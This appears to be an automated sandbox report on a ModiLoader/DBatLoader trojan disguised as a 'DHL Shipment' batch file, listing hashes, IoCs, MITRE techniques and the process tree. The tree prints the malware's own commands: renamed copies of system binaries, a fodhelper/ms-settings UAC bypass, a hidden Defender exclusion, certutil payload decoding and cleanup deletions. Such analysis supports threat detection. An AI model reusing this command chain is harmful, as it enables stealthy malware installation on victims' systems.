modiloader | ca096f44f057c7036a2ec60c8071628e70107f849d31331945429fc7f4599be0

General

Target

DHL Shipment 3338186294.bat
Size

2.5MB
MD5

c7dd17110928b64f19c2b8449d23a876
SHA1

9f190c670b55bcafc5aadca0f4da1c7c87780766
SHA256

2e0c4709969f98b16b7f1f90039cf045defe6d541610d1beaf868a4a058a1e3b
SHA512

5c8364df0e5f0c479aa21c70f27f2a02ba25858dd5858cd773321cf4c24bf89c9d3f2517df718afe706ed6302dd32415c0aa4015c633c6098c2b4371c1edaf81
SSDEEP

24576:yaaMHj/9yg91lBGZJ5rsL9jAMDpRZObauo31nXCn+RCN1DVkY5:zfD4g9wZJ589jnDpRZN65

Score

10^/10

modiloader trojan

Malware Config

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2492-60-0x0000000003090000-0x0000000004090000-memory.dmp	modiloader_stage2

Executes dropped EXE 16 IoCs

Processes:

alpha.exealpha.exealpha.exexkn.exealpha.exealpha.exekn.exealpha.exekn.exeLewxa.comalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
2852	alpha.exe
3024	alpha.exe
320	alpha.exe
1324	xkn.exe
2640	alpha.exe
2724	alpha.exe
3016	kn.exe
2476	alpha.exe
2468	kn.exe
2492	Lewxa.com
2800	alpha.exe
2804	alpha.exe
2940	alpha.exe
2108	alpha.exe
1676	alpha.exe
2332	alpha.exe

Loads dropped DLL 13 IoCs

Processes:

cmd.exealpha.exexkn.exealpha.exealpha.exeWerFault.exe

pid	process
1632	cmd.exe
1632	cmd.exe
1632	cmd.exe
320	alpha.exe
1324	xkn.exe
1324	xkn.exe
1324	xkn.exe
1632	cmd.exe
2724	alpha.exe
1632	cmd.exe
2476	alpha.exe
2428	WerFault.exe
2428	WerFault.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2428 2492 WerFault.exe Lewxa.com
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1224 taskkill.exe
1040 taskkill.exe

pid	pid_target	process	target process
2428	2492	WerFault.exe	Lewxa.com

pid	process
1224	taskkill.exe
1040	taskkill.exe

Modifies registry class 5 IoCs

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2544 reg.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

Lewxa.com

pid process

2492 Lewxa.com
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

xkn.exe

pid process

1324 xkn.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

xkn.exetaskkill.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 1324 xkn.exe
Token: SeDebugPrivilege 1224 taskkill.exe
Token: SeDebugPrivilege 1040 taskkill.exe

pid	process
2544	reg.exe

pid	process
2492	Lewxa.com

pid	process
1324	xkn.exe

description	pid	process
Token: SeDebugPrivilege	1324	xkn.exe
Token: SeDebugPrivilege	1224	taskkill.exe
Token: SeDebugPrivilege	1040	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.execmd.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exealpha.exe

description	pid	process	target process
PID 1632 wrote to memory of 2188	1632	cmd.exe	cmd.exe
PID 1632 wrote to memory of 2188	1632	cmd.exe	cmd.exe
PID 1632 wrote to memory of 2188	1632	cmd.exe	cmd.exe
PID 2188 wrote to memory of 2216	2188	cmd.exe	extrac32.exe
PID 2188 wrote to memory of 2216	2188	cmd.exe	extrac32.exe
PID 2188 wrote to memory of 2216	2188	cmd.exe	extrac32.exe
PID 1632 wrote to memory of 2852	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2852	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2852	1632	cmd.exe	alpha.exe
PID 2852 wrote to memory of 2848	2852	alpha.exe	extrac32.exe
PID 2852 wrote to memory of 2848	2852	alpha.exe	extrac32.exe
PID 2852 wrote to memory of 2848	2852	alpha.exe	extrac32.exe
PID 1632 wrote to memory of 3024	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 3024	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 3024	1632	cmd.exe	alpha.exe
PID 3024 wrote to memory of 3044	3024	alpha.exe	extrac32.exe
PID 3024 wrote to memory of 3044	3024	alpha.exe	extrac32.exe
PID 3024 wrote to memory of 3044	3024	alpha.exe	extrac32.exe
PID 1632 wrote to memory of 320	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 320	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 320	1632	cmd.exe	alpha.exe
PID 320 wrote to memory of 1324	320	alpha.exe	xkn.exe
PID 320 wrote to memory of 1324	320	alpha.exe	xkn.exe
PID 320 wrote to memory of 1324	320	alpha.exe	xkn.exe
PID 1324 wrote to memory of 2640	1324	xkn.exe	alpha.exe
PID 1324 wrote to memory of 2640	1324	xkn.exe	alpha.exe
PID 1324 wrote to memory of 2640	1324	xkn.exe	alpha.exe
PID 2640 wrote to memory of 2544	2640	alpha.exe	reg.exe
PID 2640 wrote to memory of 2544	2640	alpha.exe	reg.exe
PID 2640 wrote to memory of 2544	2640	alpha.exe	reg.exe
PID 1632 wrote to memory of 2724	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2724	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2724	1632	cmd.exe	alpha.exe
PID 2724 wrote to memory of 3016	2724	alpha.exe	kn.exe
PID 2724 wrote to memory of 3016	2724	alpha.exe	kn.exe
PID 2724 wrote to memory of 3016	2724	alpha.exe	kn.exe
PID 1632 wrote to memory of 2476	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2476	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2476	1632	cmd.exe	alpha.exe
PID 2476 wrote to memory of 2468	2476	alpha.exe	kn.exe
PID 2476 wrote to memory of 2468	2476	alpha.exe	kn.exe
PID 2476 wrote to memory of 2468	2476	alpha.exe	kn.exe
PID 1632 wrote to memory of 2492	1632	cmd.exe	Lewxa.com
PID 1632 wrote to memory of 2492	1632	cmd.exe	Lewxa.com
PID 1632 wrote to memory of 2492	1632	cmd.exe	Lewxa.com
PID 1632 wrote to memory of 2492	1632	cmd.exe	Lewxa.com
PID 1632 wrote to memory of 2800	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2800	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2800	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2804	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2804	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2804	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2940	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2940	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2940	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2108	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2108	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 2108	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 1676	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 1676	1632	cmd.exe	alpha.exe
PID 1632 wrote to memory of 1676	1632	cmd.exe	alpha.exe
PID 1676 wrote to memory of 1224	1676	alpha.exe	taskkill.exe
PID 1676 wrote to memory of 1224	1676	alpha.exe	taskkill.exe
PID 1676 wrote to memory of 1224	1676	alpha.exe	taskkill.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\DHL Shipment 3338186294.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\system32\cmd.exe
cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2188

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
3⤵
PID:2216

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2852

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
3⤵
PID:2848

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3024

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:3044

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:320

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1324

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2640

C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
5⤵
- Modifies registry class
- Modifies registry key
PID:2544

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DHL Shipment 3338186294.bat" "C:\\Users\\Public\\Lewxa.txt" 9
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2724

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\DHL Shipment 3338186294.bat" "C:\\Users\\Public\\Lewxa.txt" 9
3⤵
- Executes dropped EXE
PID:3016

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2476

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
3⤵
- Executes dropped EXE
PID:2468

C:\Users\Public\Libraries\Lewxa.com
C:\\Users\\Public\\Libraries\\Lewxa.com
2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2492 -s 716
3⤵
- Loads dropped DLL
- Program crash
PID:2428

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2800

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2804

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2940

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2108

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1224

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
2⤵
- Executes dropped EXE
PID:2332

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettingsAdminFlows.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Lewxa.txt

Filesize
1.3MB

MD5
29e95dd4fa4f5a333cb0103e70b7db23

SHA1
aee08a4a0a9f97f92d97c44c6873c7ead039abd2

SHA256
0369e2f8c7fc896b55b83035ab92efcba605b2b6feecd6946737cab5ecc2da99

SHA512
29eca59b1083b758545edda024b92a8e52d9bdd3907cea31ab7040e58cfd46cf0b6f0eae341ab8a85d04b0a66e8661290a73db3ca812db1d7671dc96025e7ee0

Download Submit
C:\Users\Public\Libraries\Lewxa.com

Filesize
629KB

MD5
5d732096429d1a7124dce75e51d42acf

SHA1
404e34724964b1dd352d9b31213f513a8914aaf3

SHA256
70d4422970d82d6f88414a74b5fd242cdca20e33c140885838d4041d0cd227ac

SHA512
27dfac2cfcf561cd316b261a4287cdff645603e7a2c3a087dbe591053c9fbbc57b281ae0c5a214fe5a690e5ea9c23331b28b6a83728e4c484a69466861c73193

Download Submit
C:\Users\Public\Libraries\Lewxa.com

Filesize
917KB

MD5
2fcbc98b3cba297ba8e87ae27d84ba9e

SHA1
9e81fe9c902a00f941789d72e060f78ecf9b3218

SHA256
8552d0af99ef6eec00d73395898a450f780711fab91efd491ce76e20b82d4fed

SHA512
80024c337a14da6a17b1fd68957f1500df69f372c9bb61dbcb5328bb65491aa7f8b5eae32b281b4e316b683a25827ef994ad27bb368fd3e463166c33b536e53f

Download Submit
C:\Users\Public\kn.exe

Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
C:\Users\Public\kn.exe

Filesize
1.0MB

MD5
785c3af6ca659c41b1a65c787c23de14

SHA1
476eee34f909e28507c4e07cfcd6f1a1da5dd9c0

SHA256
3c9a145748b310053f78a19c7b41c5103ae3a38f5072a13819d1afc97830e0a3

SHA512
d0e4f14b33733ecfacc5a1654923df3982e54e816ee461e1307dd4fbbfd296b885d0a6fc454584f2578f7b525e72acd352edd4ae0ab789bfb7a5e79e5384f314

Download Submit
\Users\Public\alpha.exe

Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
\Users\Public\xkn.exe

Filesize
462KB

MD5
852d67a27e454bd389fa7f02a8cbe23f

SHA1
5330fedad485e0e4c23b2abe1075a1f984fde9fc

SHA256
a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

SHA512
327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

Download Submit
memory/1324-34-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/1324-22-0x0000000002330000-0x0000000002338000-memory.dmp

Filesize
32KB

Download
memory/1324-33-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/1324-32-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/1324-30-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/1324-29-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/1324-28-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/1324-31-0x0000000002970000-0x00000000029F0000-memory.dmp

Filesize
512KB

Download
memory/1324-62-0x000007FEF5B20000-0x000007FEF64BD000-memory.dmp

Filesize
9.6MB

Download
memory/1324-21-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

Filesize
2.9MB

Download
memory/2492-60-0x0000000003090000-0x0000000004090000-memory.dmp

Filesize
16.0MB

Download
memory/2492-55-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2492-58-0x0000000003090000-0x0000000004090000-memory.dmp

Filesize
16.0MB

Download
memory/2492-63-0x0000000000400000-0x00000000004EE000-memory.dmp

Filesize
952KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads